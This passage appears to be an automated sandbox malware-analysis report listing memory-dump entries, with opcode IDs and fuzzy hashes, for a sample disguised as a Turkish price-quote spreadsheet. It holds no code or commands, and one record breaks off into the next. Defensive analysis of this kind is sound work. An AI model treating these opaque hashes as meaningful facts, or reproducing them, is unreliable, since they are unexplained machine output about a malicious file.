                                                  • Instruction Fuzzy Hash: 22F03070909208AFC705DFA8D45159CFFB5EB45315F2484E9D80897352D7359D11CF41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1728d9e0cc84681a10352253082125a84b7c1e98fc08e6e7ba6ac1c67d093992
                                                  • Instruction ID: 43b1e63ff061a161075df125a8e62ef6089204aa23ccb794344633809eee8a65
                                                  • Opcode Fuzzy Hash: 1728d9e0cc84681a10352253082125a84b7c1e98fc08e6e7ba6ac1c67d093992
                                                  • Instruction Fuzzy Hash: 0AE01A313042095BC7149A2AF984C4BFB9EEFC4264710CA3AA10E87229DE74ED0AC6A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed30bc44c686dbe55c964009a6f486b158363c42adcce849e60dd687cb1529ba
                                                  • Instruction ID: 8648c69a2240ac1563bdf7f13ecd9abaab1fee4087a544a24dedd77f0b011bc5
                                                  • Opcode Fuzzy Hash: ed30bc44c686dbe55c964009a6f486b158363c42adcce849e60dd687cb1529ba
                                                  • Instruction Fuzzy Hash: D1F039B4E15208AFCB40EFA8D4496ACBBF5FB08602F1081EAE844A7351E6349A14EF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df7259e2ac9e98432c3e5c3a7d351cee789fb96d95d407695ba032b46e500d65
                                                  • Instruction ID: 17f93e807b7778653a1567af489547e3ea02c32e570a73fc24d0993b1ec499f0
                                                  • Opcode Fuzzy Hash: df7259e2ac9e98432c3e5c3a7d351cee789fb96d95d407695ba032b46e500d65
                                                  • Instruction Fuzzy Hash: 43F06D71A1E388DFCB01DBB8941E59CBFB5AB09202F5541EAD808D7252E7305A44EB52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 391808a6ae3b48dcbc345bb1f6cff4e758f3bfee19289fa71d5b60122af91dfc
                                                  • Instruction ID: 290f17163b7dbe0cb516b126e4d17d58bc48f01f3ec1c468caafb25213b0a7f1
                                                  • Opcode Fuzzy Hash: 391808a6ae3b48dcbc345bb1f6cff4e758f3bfee19289fa71d5b60122af91dfc
                                                  • Instruction Fuzzy Hash: 09E04F3450D248AFC702DB54D844E68BBBCEB1F201B0546DA9C099B263D732AE21E762
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc7e1c989c24fc15a1ea5bd178fa0b13401efdd59f8eaef58cf89f18bc2769a5
                                                  • Instruction ID: cfef6d5d90ff136d5f6092ff61dc7f97cc596f8811062c1f9a082c0cb803a8ed
                                                  • Opcode Fuzzy Hash: bc7e1c989c24fc15a1ea5bd178fa0b13401efdd59f8eaef58cf89f18bc2769a5
                                                  • Instruction Fuzzy Hash: D5E02630819208DFD700EBA4D882BADFB75EB54311FA481A8DC061B342CB32AE03DBD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d41feb2301078f9292e37e2203cb076627bdb3a29663475cc3dfd35013f95045
                                                  • Instruction ID: a8347a0fd6b6e359aae7f21f752d63faf3448f99ab6d2b2270231d42c052bc1f
                                                  • Opcode Fuzzy Hash: d41feb2301078f9292e37e2203cb076627bdb3a29663475cc3dfd35013f95045
                                                  • Instruction Fuzzy Hash: EAF07A70D0A218CFD758DF6AC444BACFAF6FB49704F54D099D46A97255DB305481CF10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2b3febe774ab89886f858627b494abc8287a871b9102decbc8ec7463a5b1edf
                                                  • Instruction ID: d650a4f1b6a0aac8be48dfa11e9ad5e6985f70966b3f5f6e269eabadbb4a9518
                                                  • Opcode Fuzzy Hash: b2b3febe774ab89886f858627b494abc8287a871b9102decbc8ec7463a5b1edf
                                                  • Instruction Fuzzy Hash: C8F0EC71E05384BFDB01EF74E941A697BA5EB62104F404099D4085B144EB357E12A751
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a811d6edf3f1f90935f31d29ed931b92eb020c78ac0d09a6ad42fbde24eb1a2
                                                  • Instruction ID: aa60aa30c691ef760e2e0d689b7e0e9bff6692b20ab10a02b5edd6911325f447
                                                  • Opcode Fuzzy Hash: 9a811d6edf3f1f90935f31d29ed931b92eb020c78ac0d09a6ad42fbde24eb1a2
                                                  • Instruction Fuzzy Hash: E7F06D75D09208EFC701DBA8D4856ACBFB4EF4A301F4451E5E88597361D6309A41EF51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba5de323c36c7b664396405255a772278d51143277f1a0d2653414781072271a
                                                  • Instruction ID: 15b532aa9af24c301bb48451891db9e31fcbca31d528ce1b65e3aeaf5189db3c
                                                  • Opcode Fuzzy Hash: ba5de323c36c7b664396405255a772278d51143277f1a0d2653414781072271a
                                                  • Instruction Fuzzy Hash: 98E01A71D25248AFCB40EFA8D54579D7AF5FB45205F2040A9C808A3350E7319A94CB52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 005ff9b01a441969685ca539e08571dbe5ad63973602e17dd59890ea934ed040
                                                  • Instruction ID: 70779afd47ef3b5d42afcd298a9df723af6893248d90e36a627ad611483ef103
                                                  • Opcode Fuzzy Hash: 005ff9b01a441969685ca539e08571dbe5ad63973602e17dd59890ea934ed040
                                                  • Instruction Fuzzy Hash: 95E0D83090C10CEFC704DB94D589E9DBBB5EB85305F1091A9D80863351CB329902CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1372fbee4541ebe4953b0388754856f4df49247d1fca3e3f8d7ed5d87be04e38
                                                  • Instruction ID: e383ad7492cbae6f7eff1c84428919d6652ce6b2b78c59ecb55c4bd4d93d6daa
                                                  • Opcode Fuzzy Hash: 1372fbee4541ebe4953b0388754856f4df49247d1fca3e3f8d7ed5d87be04e38
                                                  • Instruction Fuzzy Hash: 86E02B71D05209AFCB01DF60E941B5DBBA5DB02210F0141EDD408A720ADB759E40A7A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da1035b77ce285f083fb73ec3ec7955d3ed02ebeeb5099ec69c530ae8967856c
                                                  • Instruction ID: 7a3556e001c9be8ad1fdef3e4fcd031101340fb4ee4c63d33897334d14d38463
                                                  • Opcode Fuzzy Hash: da1035b77ce285f083fb73ec3ec7955d3ed02ebeeb5099ec69c530ae8967856c
                                                  • Instruction Fuzzy Hash: 4BF0153490420CEFCB01DF98E8409ACBBB6FB48310F10D0AAEC4853351D7729A61EF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f826732cdd093c932d6831ea2a8029bf06b70648bae4581d11393d4353fcf85
                                                  • Instruction ID: 989906443bfd4f6658bd016e77166a973e4f0596a096e502955d1b4d63d5a048
                                                  • Opcode Fuzzy Hash: 4f826732cdd093c932d6831ea2a8029bf06b70648bae4581d11393d4353fcf85
                                                  • Instruction Fuzzy Hash: FBF06D74D15208AFCB40EFA9D0092ACBFF9FB48701F1081BA984493394E7389E44DF51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 175b651256d5ae0a25b93931bde03805e50b89bed97da042d2efebecff7c06bf
                                                  • Instruction ID: 023e508bb141e6d6e2dc707a4fe3edf76c3f5bc6b35357d83b164e6941fc2a2e
                                                  • Opcode Fuzzy Hash: 175b651256d5ae0a25b93931bde03805e50b89bed97da042d2efebecff7c06bf
                                                  • Instruction Fuzzy Hash: 23F09B7881C344AFCB01DF90D8549ADBF72AB5A311F15C0EADC4457362D7318E55DB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf0d7cae6644e839b289adbb46ed8e65dc2a3585ed780d4c91db4086413866f5
                                                  • Instruction ID: d57157e3e4e406af5cf9d1ca9fc368fa802603369cca5d5837b1904a941909ea
                                                  • Opcode Fuzzy Hash: cf0d7cae6644e839b289adbb46ed8e65dc2a3585ed780d4c91db4086413866f5
                                                  • Instruction Fuzzy Hash: 1DE086303503045BCE58B7689D04F62B3EDEB46610F540869D61B5F280D962E8018B71
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16fe456106eae53201406116c07f5a42d249a492b86fd8e75bca7c596a517551
                                                  • Instruction ID: 3ee680707333b8069838b3bd6867be938c70e0e0fe5762d3b3180bbf3a961edc
                                                  • Opcode Fuzzy Hash: 16fe456106eae53201406116c07f5a42d249a492b86fd8e75bca7c596a517551
                                                  • Instruction Fuzzy Hash: B4E02C38C0A208EFC748EFA0E8047EEBBB4EB02302F2045B8D80423344C3308A90CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 492e5ac02173a651b09bbf668a4ea6e12892448d19c5ba6830bd7cbe788cdab7
                                                  • Instruction ID: 8f0cce3e85fcf60d05f77eb68d15e58a82f20f1f167cc87e0d4ee5be54b0e852
                                                  • Opcode Fuzzy Hash: 492e5ac02173a651b09bbf668a4ea6e12892448d19c5ba6830bd7cbe788cdab7
                                                  • Instruction Fuzzy Hash: A0E0E530A14248AFC785EFA8D445BBCFBB5EB48215F2481A9984AD3341D632AA51CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a779d675d4da85177bb4807d158ec8a6902c3cfe7748132bc28950cb0a23412b
                                                  • Instruction ID: 29210b44391ae02d2c9dc1063fcb0bd6d8ae9e7a2d47f84c439334971c440b38
                                                  • Opcode Fuzzy Hash: a779d675d4da85177bb4807d158ec8a6902c3cfe7748132bc28950cb0a23412b
                                                  • Instruction Fuzzy Hash: BCE0D8B390D1808FCB159B28AC55C627F36E96224074441D5D4098B025E228C907E760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 881b4bd1017e9003b4b03e92284eee6b2cc2ff715199d54087d9d6c7ce7176be
                                                  • Instruction ID: 61cd96a2a95385c0f5339ee36f8cd8a51ccd0eca29152e7731c4541e608d740e
                                                  • Opcode Fuzzy Hash: 881b4bd1017e9003b4b03e92284eee6b2cc2ff715199d54087d9d6c7ce7176be
                                                  • Instruction Fuzzy Hash: 39E06539808108EBCB01CF94E8449ADBBB6FB48300F149099ED44232A1C7329A61EB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c83530fb4bb6df1e86cddccc2597814d18419bf5ba3e0454d18b7dd2f0ddadd
                                                  • Instruction ID: 835a40998185a707d584ad01591f8df4374d1473ef811edfe737e2a5d85eb71c
                                                  • Opcode Fuzzy Hash: 4c83530fb4bb6df1e86cddccc2597814d18419bf5ba3e0454d18b7dd2f0ddadd
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 549f9ef05d6760014fcfbdceef3912280ebbd61faefc67105229b50cb7b1d1b4
                                                  • Instruction ID: 80759a5162e185d3b3b73cd63fb07fc659fffdd905c8625d894c52a9b263a231
                                                  • Opcode Fuzzy Hash: 549f9ef05d6760014fcfbdceef3912280ebbd61faefc67105229b50cb7b1d1b4
                                                  • Instruction Fuzzy Hash: ECF0A0749092488FCB21CF24C8586DDBFB1EF08300F0540EAD089A7251CBB449C28F05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8824d7c57a0aa552b0c1576ce2cd6aafe0defc5670fcdee0af37562ed51857c8
                                                  • Instruction ID: 291e86fdc25b0edfd375d77322177d4ec1cf00f42f8668434dce423c258b109e
                                                  • Opcode Fuzzy Hash: 8824d7c57a0aa552b0c1576ce2cd6aafe0defc5670fcdee0af37562ed51857c8
                                                  • Instruction Fuzzy Hash: 31E04674908208EBCB04DFA4E8459ACBBB5FB45311F1091A99C8563352C772AA92DB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction ID: efce061b06bdb29d1a1de2a3144567e0d20f6b19904f93ec1230e9d422ec7aa4
                                                  • Opcode Fuzzy Hash: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction Fuzzy Hash: EBE01A34D09108EFCB04DF98D4455ACBBB5EB49205F1081E9D85853341D6319A01DF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction ID: d6e262ea3e8f8bb64feed8b884973ef8fd7730e65303e67a1184db03fb7776e4
                                                  • Opcode Fuzzy Hash: 73f7c38bfbe4f8e9286d73261f61ef7b39882a66dc4450f86db83c34af5fa143
                                                  • Instruction Fuzzy Hash: F7E01234D08208EFCB04DFA9D4456ACBBB9EB88205F1081EA985853341D732AA56DF81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cff971b782081be872672ab8b8778b010fc845ab8df5307d8135c937a7faade
                                                  • Instruction ID: 3fa48b834514f1a044d1b514147ded6566fca5e10e999ca724de7a5536e2dbc8
                                                  • Opcode Fuzzy Hash: 8cff971b782081be872672ab8b8778b010fc845ab8df5307d8135c937a7faade
                                                  • Instruction Fuzzy Hash: 5DE0C23085120CDFCB01FBB89444A9E77F9EB49201F8005F5840497120FAB15A10E7A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1190437d47bf5767d391589164d77a1514a050ed58f637e80ef7507b3edb879e
                                                  • Instruction ID: 07e9b6e591f0df1c9c55dd63f57d25ea0d04336116ad0c51e9e93a1e48ef7973
                                                  • Opcode Fuzzy Hash: 1190437d47bf5767d391589164d77a1514a050ed58f637e80ef7507b3edb879e
                                                  • Instruction Fuzzy Hash: E6E0EC70915308DFCB54EFB89544A9DBBF5AB44205F5041A98908A2350E7719A90CB42
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction ID: 033ac0aef75d45d191c6f8b9982243ae5c52212f19f79557d8e7bbe02d148718
                                                  • Opcode Fuzzy Hash: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction Fuzzy Hash: F5E08C34908108DBC704DB94E4849ACBBB5EB89305F1081A8980823355CB32AE02CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b63ed97b3e152298f6b92ec9916f864f2a0c2475fbd538292ca5eec9796aeb38
                                                  • Instruction ID: bcaa2698669a69f7b02b3ff4ea8d36f063f0ae0fc17dbda38422d4385fdcc318
                                                  • Opcode Fuzzy Hash: b63ed97b3e152298f6b92ec9916f864f2a0c2475fbd538292ca5eec9796aeb38
                                                  • Instruction Fuzzy Hash: E3E0C23185120CAFC701EBF49448ADE77B9EB05201F4001F5850593110EAB15A10D7E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction ID: b831ed22cf4865f49a088c898bb6a1acb9ecd12d62c4c5993c697aaac4902426
                                                  • Opcode Fuzzy Hash: 4fdec3993ac14849a3cc2467ebba5d23c0adf6bfae93d05cc50bfa250144abd2
                                                  • Instruction Fuzzy Hash: 08E08C34908108EBC704EFE4E4529ACBBB9FB45311F1081AAC80813351DB32AE02CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c99335761a0cf0685501d0f887a98d685e8e516e5074902af9b4bda89405192
                                                  • Instruction ID: 190629fbf154e6cdbab652623721f72444c06420c27b5a694eec1a63a1ca4157
                                                  • Opcode Fuzzy Hash: 6c99335761a0cf0685501d0f887a98d685e8e516e5074902af9b4bda89405192
                                                  • Instruction Fuzzy Hash: 46E04671206209CFC324CB56E486A6277A3FB8C300F1582A1E60E47326CB34AC82DF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1077ddb2a82247e2f3350f543bd16545087f80d1b44f18ebc7e90fb55c77016e
                                                  • Instruction ID: 1ea8e20e1876ff5299021faf734a017904dddd54f4c0c23cd3b6403d0752d1f4
                                                  • Opcode Fuzzy Hash: 1077ddb2a82247e2f3350f543bd16545087f80d1b44f18ebc7e90fb55c77016e
                                                  • Instruction Fuzzy Hash: 79E01274919208DBCB05DF94E9415ACBFB6FB49315F5081E9DC0917351C732AE52DB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51fe7e2a92a429b45d6b321cbf46bd9c1cca685890a1939d4f0dadfb0f3fa4c8
                                                  • Instruction ID: 595d67bdc05d3babd7cb49f53a76038ce6f51b4eee17553bb637e0ae34ac6da4
                                                  • Opcode Fuzzy Hash: 51fe7e2a92a429b45d6b321cbf46bd9c1cca685890a1939d4f0dadfb0f3fa4c8
                                                  • Instruction Fuzzy Hash: 86E0EC74D69208DFCB40EFA8D4456ACBBF9AB09211F6041B9980993350E7355A50DBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3f8194a09731cd202910420cdc236164c03aa87d90f00dc4f041a67637ae68aa
                                                  • Instruction ID: 2a327efa830a7700ce1352c82a0f0d31bb678ef113cfa54cbee3efd6947cfaf6
                                                  • Opcode Fuzzy Hash: 3f8194a09731cd202910420cdc236164c03aa87d90f00dc4f041a67637ae68aa
